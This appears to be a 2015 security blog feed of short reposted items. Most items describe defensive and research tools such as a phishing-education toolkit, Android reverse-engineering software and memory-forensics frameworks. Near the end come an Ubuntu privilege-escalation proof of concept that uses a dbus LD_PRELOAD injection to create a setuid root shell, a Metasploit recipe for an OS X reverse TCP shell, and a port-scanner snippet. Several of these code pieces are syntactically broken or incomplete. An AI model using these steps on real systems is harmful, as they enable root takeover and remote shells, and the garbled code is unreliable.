Apr 25, 2015

Tools: Sptoolkit Rebirth - Phishing Education Toolkit

The spt (rebirth) project is an open source phishing education toolkit that aims to help in securing the mind as opposed to securing computers. Organizations spend billions of dollars annually in an effort to safeguard information systems, but spend little to nothing on the under trained and susceptible minds that operate these systems, thus rendering most technical protections instantly ineffective. A simple, targeted link is all it takes to bypass the most advanced security protections. The link is clicked, the deed is done.

spt was developed from the ground up to provide a simple and easy to use framework to identify your weakest links so that you can patch the human vulnerability. If the spt project sounds interesting to you, please consider downloading it for evaluation in your own organization. Feedback is welcomed and always appreciated.
The Basics
  1. Create and configure the MySQL database. spt will need a MySQL database to house its data, so go ahead and create that database and configure the associated user account for the new database with ALL PRIVILEGES assigned to it. Be sure you record the database name, user name and password in a safe place, you'll need it soon to install spt!
  2. Ensure you have PHP 5.4
  3. Extract the spt files from the archive.
  4. Create a new directory on your web server, such as "spt" and upload the files to the directory.
Install spt
  1.  Open your web browser and navigate to the location where you uploaded the files and browse to install.php. For example, http://www.myhost.com/spt/install.php. If you accidentally just go to the root of the folder you placed the files in, you will be prompted to start the installation by clicking the right pointing arrow.
  2. When prompted to accept the GNU General Public License, click the "I Agree!" button. For reference, you can read the full text of the license in the license.htm file included in the root of the extracted files.
  3. On the next page, you will get feedback on the readiness of your server to install the spt. You can learn more about any failed items by hovering over the icon. Click the “Proceed!” button if all checks passed, or click the “Proceed Anyways” button if one of the checks failed and you have verified that the spt installer is reporting incorrectly.
  4. On the next page, you will need to provide those database details from earlier. The default server and database ports are provided, be sure to change them if your installation will require something else. Enter in the remaining required information and click the "Install Database!" button to get things moving along.
  5. If all goes well, you will see a listing of tables that have been successfully created. Click "Continue!" to move on.
  6. If instead you see an error indicated, click the "<back" button to go back and enter the database information again.
  7. Now it's time to create your first user, for you! Enter your first and last name, email address and password and click the "Create User" button to continue on.
  8. If you receive any errors, such as for an invalid email address or a password that does not meet the complexity requirements, click the "<back" button and try it again.
  9. Once you enter the required information successfully, you will receive confirmation. Click the "Proceed to Login" button to get logged into the spt!
  10. Now it's time to login using the email address and password you entered in the previous step. See, that was easy!
Source:: http://www.kitploit.com/2015/04/sptoolkit-rebirth-phishing-education.html

Tools: CodeInspect - Reverse-Engineering Tool for Android and Java Bytecode

Developing an Android application in an IDE is very convenient since features like code completion, Open Declaration, renaming variables, searching files etc. help the developer a lot. Especially code-debugging is a very important feature in IDEs. Usually, all those features are available for the source code and not for the bytecode, since they support the developer not a reverse-engineer. Well, but all those features would be be also very helpful for reverse-engineering Android or Java applications. This is the reason why we came up with a new reverse-engineering framework that works on the intermediate representation Jimple and supports all the features above and a lot more. In the following we give a detailed description about CodeInspect and its features.
CodeInspect supports as input format a complete Android Application Package (apk), just the Android bytecode (dex-file) or a jar-file. In the following we will describe the different features based on a malicious Android apk.

Source:: http://sseblog.ec-spride.de/2014/12/codeinspect/

Apr 24, 2015

Tools: VolDiff: Malware Memory Footprint Analysis

1.Capture a memory dump of a clean Windows system and save it as “baseline.raw”. This image will serve as a baseline for the analysis.
2.Execute your malware sample on the same system, then take a second memory dump and save it as “infected.raw”.
3.Run VolDiff:

Source:: http://seclist.us/voldiff-malware-memory-footprint-analysis.html

Tools: ShadowOS - Test Android Vuln by HP

What is ShadowOS
     ShadowOS is a free tool designed by Fortify on Demand to help Security and QA teams test Android applications for security vulnerabilities. It is a custom OS based off of KitKat that intercepts specific areas of the device's operation and makes testing apps for security vulnerabilites easier.  The OS runs as an emulator image so no hardware is required.

How Does it Work
     ShadowOS contains a custom Android emulator image that communicates with a Windows Monitor application. Simply install the app you want to test on the emulator and exercise the app.  As the app runs, you will see events show up in the monitor application, in real time, which takes the guesswork out of your security assessment.  Since ShadowOS is a modified version of the Android source code, it has the ability to capture HTTPS traffic before encryption.   This allows you to see SSL traffic even if the mobile application is pinning certificates.  This is where proxying the traffic with other tools ususally fails.

Source:: http://h30499.www3.hp.com/t5/Fortify-Application-Security/Announcing-ShadowOS/ba-p/6725771#.VTkAS01FAiR?hootPostID=4492cf0a16bb7d39901d84d0ebbe8395

Apr 23, 2015

Ubuntu Privilege Escalation in Ubuntu 15.04

(I tried in Ubuntu Desktop 14.04.2 but it's not work for me. I don't sure that which version is work with this exploit)

Note:: "on a fresh install of Ubuntu 14.04 LTS desktop, the PoC doesn't work because dbus needs a "kvm" in its PATH. The PoC works if you install qemu-kvm (which brings /usr/bin/kvm) or if dbus has any "kvm" binary in its PATH"
From:: http://www.reddit.com/r/netsec/comments/33kmyt/ubuntu_local_privilege_escalation_posted_to/

1. Create test.c
void __attribute__((constructor)) init (void)
chown("/tmp/test", 0, 0);
chmod("/tmp/test", 04755);

2.  Compile it
# gcc -shared -fPIC -o /tmp/test.so test.c

3. Copy sh to /tmp
# cp /bin/sh /tmp/test

4. Using dbus
# dbus-send --print-reply --system --dest=com.ubuntu.USBCreator /com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"

5.  Run /tmp/test
# /tmp/test

Now it's fixed on Ubuntu 15.04

Source:: http://www.openwall.com/lists/oss-security/2015/04/22/12

Apr 21, 2015

Tools: Rekall - The Most Complete Memory Analysis Framework

The Rekall Framework is a completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile memory (RAM) samples. The extraction techniques are performed completely independent of the system being investigated but offer visibilty into the runtime state of the system. The framework is intended to introduce people to the techniques and complexities associated with extracting digital artifacts from volatile memory samples and provide a platform for further work into this exciting area of research.

Source:: http://www.kitploit.com/2015/04/rekall-most-complete-memory-analysis.html

Howto: Remote Shell On Mac

- msfpayload osx/x86/shell_reverse_tcp LHOST= LPORT=4444 R > osxv

msf> use exploit/multi/hander
msf exploit> set payload osx/x86/shell_reverse_tcp
msf exploit (handler) > set LHOST
msf exploit (handler) > set LPORT 4444
msf exploit (handler) > exploit

Python: Port Scanning

#!/usr/bin/env python
import socket

target=raw_input("Target: ")
ports = [22,80,443,8000]
#max_port=raw_input("Maximum port to scan: ")
for port in ports:
        print "============================================"
        print "Scanning to " + target + ":"+str(port)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.send('Testing scan port \r\n')
                if banner:
                        print "Port is open"+str(port)+" open: "+banner
        except: pass